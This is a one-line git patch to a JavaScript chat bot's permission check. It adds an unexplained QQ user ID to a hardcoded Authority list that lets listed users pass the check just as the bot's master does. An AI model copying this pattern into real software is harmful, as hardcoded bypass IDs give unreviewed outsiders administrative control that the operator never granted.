From b60b99588fb029bc3e87de7e2e8f696adf37c86d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9B=89K?= <3399280843@qq.com> Date: Sun, 17 Mar 2024 09:45:11 +0000 Subject: [PATCH] update lib/common/common.js. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 曉K <3399280843@qq.com> --- lib/common/common.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/common/common.js b/lib/common/common.js index 1588f76..d9a02e5 100644 --- a/lib/common/common.js +++ b/lib/common/common.js @@ -34,7 +34,7 @@ export default new class { } // 判断权限 if (e.isMaster) return true - const Authority = [1509293009,2536554304,3139373986] + const Authority = [746659424,1509293009,2536554304,3139373986] if (Authority.includes(e.user_id)) return true if (permission == 'master' && !e.isMaster) {